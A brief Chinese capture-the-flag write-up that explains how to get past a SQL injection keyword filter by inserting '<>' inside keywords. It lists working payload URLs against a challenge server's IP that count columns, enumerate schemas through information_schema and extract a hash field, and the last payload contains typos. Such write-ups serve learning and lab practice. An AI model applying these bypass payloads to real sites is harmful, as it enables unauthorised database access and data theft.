http://103.238.227.13:10087/?id=1

由源码来看是没有办法注入的,几乎都是过滤了的。但是经过测试加<>符号会被直接替换为空。

那么就可以借助此进行bypass

http://103.238.227.13:10087/?id=1 a<>nd 1=1%23

http://103.238.227.13:10087/?id=1 a<>nd 1=2%23

http://103.238.227.13:10087/?id=1 o<>rder b<>y 2%23 得是2

查看所有库

http://103.238.227.13:10087/?id=-1%20un%3C%3Eion%20se%3C%3Elect%201,concat(group_concat(distinct+schema_name))%20fr%3C%3Eom%20info%3C%3Ermation_schema.schemata--+

[一] sqlinject bypass

得到两个库information_schema、sql3

第一个是系统默认的那么直接上sql3。题目当中说在sql3这个表里的hash字段当中。那么直接

http://103.238.227.13:10087/?id=-1 uni<>on selec<>t  1,hash fo<>m sql3.key%23

 

相关文章:

  • 2021-11-26
  • 2022-02-02
  • 2021-12-06
  • 2021-11-26
  • 2021-08-06
  • 2021-12-21
  • 2021-07-14
  • 2022-12-23
猜你喜欢
  • 2021-11-26
  • 2021-12-04
  • 2021-09-22
  • 2022-03-11
  • 2022-12-23
  • 2022-12-23
  • 2023-03-05
相关资源
相似解决方案